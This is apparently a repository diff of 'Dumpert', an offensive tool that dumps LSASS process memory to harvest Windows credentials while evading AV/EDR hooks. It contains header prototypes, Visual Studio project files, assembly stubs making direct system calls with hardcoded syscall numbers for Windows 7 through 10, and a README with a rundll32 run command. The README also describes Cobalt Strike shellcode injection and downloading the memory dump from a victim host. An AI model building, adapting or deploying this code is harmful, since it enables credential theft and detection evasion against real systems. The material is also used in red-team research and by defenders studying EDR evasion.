EXTERN_C NTSTATUS NtCreateFile81(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength);
// Windows 10 / Server 2016 specific Syscalls
EXTERN_C NTSTATUS NtAllocateVirtualMemory10(HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);
EXTERN_C NTSTATUS NtFreeVirtualMemory10(HANDLE ProcessHandle, PVOID *BaseAddress, IN OUT PSIZE_T RegionSize, ULONG FreeType);
EXTERN_C NTSTATUS ZwOpenProcess10(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId);
EXTERN_C NTSTATUS ZwClose10(IN HANDLE KeyHandle);
EXTERN_C NTSTATUS ZwWriteVirtualMemory10(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead);
EXTERN_C NTSTATUS ZwProtectVirtualMemory10(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection);
EXTERN_C NTSTATUS WINAPI ZwQuerySystemInformation10(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);
EXTERN_C NTSTATUS NtCreateFile10(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength);
NTSTATUS(*NtAllocateVirtualMemory)(
HANDLE ProcessHandle,
PVOID *BaseAddress,
ULONG_PTR ZeroBits,
PSIZE_T RegionSize,
ULONG AllocationType,
ULONG Protect
);
NTSTATUS(*NtFreeVirtualMemory)(
HANDLE ProcessHandle,
PVOID *BaseAddress,
IN OUT PSIZE_T RegionSize,
ULONG FreeType
);
NTSTATUS(*ZwOpenProcess)(
PHANDLE ProcessHandle,
ACCESS_MASK DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes,
PCLIENT_ID ClientId
);
NTSTATUS(WINAPI *ZwQuerySystemInformation)(
SYSTEM_INFORMATION_CLASS SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength
);
NTSTATUS(*ZwWriteVirtualMemory)(
HANDLE hProcess,
PVOID lpBaseAddress,
PVOID lpBuffer,
SIZE_T NumberOfBytesToRead,
PSIZE_T NumberOfBytesRead
);
NTSTATUS(*ZwProtectVirtualMemory)(
IN HANDLE ProcessHandle,
IN PVOID* BaseAddress,
IN SIZE_T* NumberOfBytesToProtect,
IN ULONG NewAccessProtection,
OUT PULONG OldAccessProtection
);
NTSTATUS(*NtCreateFile)(
PHANDLE FileHandle,
ACCESS_MASK DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes,
PIO_STATUS_BLOCK IoStatusBlock,
PLARGE_INTEGER AllocationSize,
ULONG FileAttributes,
ULONG ShareAccess,
ULONG CreateDisposition,
ULONG CreateOptions,
PVOID EaBuffer,
ULONG EaLength
);
NTSTATUS(*ZwClose)(
IN HANDLE KeyHandle
);
typedef NTSTATUS(NTAPI *_RtlGetVersion)(
LPOSVERSIONINFOEXW lpVersionInformation
);
typedef void (WINAPI* _RtlInitUnicodeString)(
PUNICODE_STRING DestinationString,
PCWSTR SourceString
);
typedef NTSYSAPI BOOLEAN(NTAPI *_RtlEqualUnicodeString)(
PUNICODE_STRING String1,
PCUNICODE_STRING String2,
BOOLEAN CaseInSensitive
);
Dumpert/Outflank-Dumpert/Outflank-Dumpert.vcxproj
Executable
+130
View File
@@ -0,0 +1,130 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}</ProjectGuid>
<RootNamespace>OutflankDumpert</RootNamespace>
<WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>
<ProjectName>Outflank-Dumpert</ProjectName>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v140</PlatformToolset>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v140</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v140</PlatformToolset>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v140</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup />
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<SDLCheck>true</SDLCheck>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<SDLCheck>true</SDLCheck>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>false</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="Dumpert.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="Dumpert.h" />
</ItemGroup>
<ItemGroup>
<MASM Include="Syscalls.asm" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>
Dumpert/Outflank-Dumpert/Outflank-Dumpert.vcxproj.filters
Executable
+32
View File
@@ -0,0 +1,32 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<MASM Include="Syscalls.asm">
<Filter>Source Files</Filter>
</MASM>
</ItemGroup>
<ItemGroup>
<ClInclude Include="Dumpert.h">
<Filter>Header Files</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<ClCompile Include="Dumpert.c">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
</Project>
Dumpert/Outflank-Dumpert/Outflank-Dumpert.vcxproj.user
Executable
+4
View File
@@ -0,0 +1,4 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup />
</Project>
Dumpert/Outflank-Dumpert/Syscalls.asm
Executable
+237
View File
@@ -0,0 +1,237 @@
.code
; Reference: https://j00ru.vexillium.org/syscalls/nt/64/
; Windows 7 SP1 / Server 2008 R2 specific syscalls
ZwOpenProcess7SP1 proc
mov r10, rcx
mov eax, 23h
syscall
ret
ZwOpenProcess7SP1 endp
ZwClose7SP1 proc
mov r10, rcx
mov eax, 0Ch
syscall
ret
ZwClose7SP1 endp
ZwWriteVirtualMemory7SP1 proc
mov r10, rcx
mov eax, 37h
syscall
ret
ZwWriteVirtualMemory7SP1 endp
ZwProtectVirtualMemory7SP1 proc
mov r10, rcx
mov eax, 4Dh
syscall
ret
ZwProtectVirtualMemory7SP1 endp
ZwQuerySystemInformation7SP1 proc
mov r10, rcx
mov eax, 33h
syscall
ret
ZwQuerySystemInformation7SP1 endp
NtAllocateVirtualMemory7SP1 proc
mov r10, rcx
mov eax, 15h
syscall
ret
NtAllocateVirtualMemory7SP1 endp
NtFreeVirtualMemory7SP1 proc
mov r10, rcx
mov eax, 1Bh
syscall
ret
NtFreeVirtualMemory7SP1 endp
NtCreateFile7SP1 proc
mov r10, rcx
mov eax, 52h
syscall
ret
NtCreateFile7SP1 endp
; Windows 8 / Server 2012 specific syscalls
ZwOpenProcess80 proc
mov r10, rcx
mov eax, 24h
syscall
ret
ZwOpenProcess80 endp
ZwClose80 proc
mov r10, rcx
mov eax, 0Dh
syscall
ret
ZwClose80 endp
ZwWriteVirtualMemory80 proc
mov r10, rcx
mov eax, 38h
syscall
ret
ZwWriteVirtualMemory80 endp
ZwProtectVirtualMemory80 proc
mov r10, rcx
mov eax, 4Eh
syscall
ret
ZwProtectVirtualMemory80 endp
ZwQuerySystemInformation80 proc
mov r10, rcx
mov eax, 34h
syscall
ret
ZwQuerySystemInformation80 endp
NtAllocateVirtualMemory80 proc
mov r10, rcx
mov eax, 16h
syscall
ret
NtAllocateVirtualMemory80 endp
NtFreeVirtualMemory80 proc
mov r10, rcx
mov eax, 1Ch
syscall
ret
NtFreeVirtualMemory80 endp
NtCreateFile80 proc
mov r10, rcx
mov eax, 53h
syscall
ret
NtCreateFile80 endp
; Windows 8.1 / Server 2012 R2 specific syscalls
ZwOpenProcess81 proc
mov r10, rcx
mov eax, 25h
syscall
ret
ZwOpenProcess81 endp
ZwClose81 proc
mov r10, rcx
mov eax, 0Eh
syscall
ret
ZwClose81 endp
ZwWriteVirtualMemory81 proc
mov r10, rcx
mov eax, 39h
syscall
ret
ZwWriteVirtualMemory81 endp
ZwProtectVirtualMemory81 proc
mov r10, rcx
mov eax, 4Fh
syscall
ret
ZwProtectVirtualMemory81 endp
ZwQuerySystemInformation81 proc
mov r10, rcx
mov eax, 35h
syscall
ret
ZwQuerySystemInformation81 endp
NtAllocateVirtualMemory81 proc
mov r10, rcx
mov eax, 17h
syscall
ret
NtAllocateVirtualMemory81 endp
NtFreeVirtualMemory81 proc
mov r10, rcx
mov eax, 1Dh
syscall
ret
NtFreeVirtualMemory81 endp
NtCreateFile81 proc
mov r10, rcx
mov eax, 54h
syscall
ret
NtCreateFile81 endp
; Windows 10 / Server 2016 specific syscalls
ZwOpenProcess10 proc
mov r10, rcx
mov eax, 26h
syscall
ret
ZwOpenProcess10 endp
ZwClose10 proc
mov r10, rcx
mov eax, 0Fh
syscall
ret
ZwClose10 endp
ZwWriteVirtualMemory10 proc
mov r10, rcx
mov eax, 3Ah
syscall
ret
ZwWriteVirtualMemory10 endp
ZwProtectVirtualMemory10 proc
mov r10, rcx
mov eax, 50h
syscall
ret
ZwProtectVirtualMemory10 endp
ZwQuerySystemInformation10 proc
mov r10, rcx
mov eax, 36h
syscall
ret
ZwQuerySystemInformation10 endp
NtAllocateVirtualMemory10 proc
mov r10, rcx
mov eax, 18h
syscall
ret
NtAllocateVirtualMemory10 endp
NtFreeVirtualMemory10 proc
mov r10, rcx
mov eax, 1Eh
syscall
ret
NtFreeVirtualMemory10 endp
NtCreateFile10 proc
mov r10, rcx
mov eax, 55h
syscall
ret
NtCreateFile10 endp
end
README.md
+28 -2
View File
@@ -1,2 +1,28 @@
# Dumpert ### Dumpert, a LSASS memory dumper using direct system calls and API unhooking
LSASS memory dumper using direct system calls and API unhooking
Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products.
These tools demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike,
while not touching disk and evading AV/EDR monitored user-mode API calls.
Two version of the code are included:
An executable version and a DLL version of the code.
The DLL version can be run as follow:
```
rundll32.exe C:\Dumpert\Outflank-Dumpert.dll,Dump
```
Also a sRDI version of the code is provided, including an Cobalt Strike agressor script.
This script uses shinject to inject the sRDI shellcode version of the dumpert DLL into the current process.
Then it waits a few seconds for the lsass minidump to finish and finally download the minidump file from the victim host.
Compile instructions:
```
This project is written in C and assembly.
You can use Visual Studio to compile it from source.
```
More info about the used techniques can be found on the following Blog:
The sRDI code can be found here: https://github.com/monoxgas/sRDI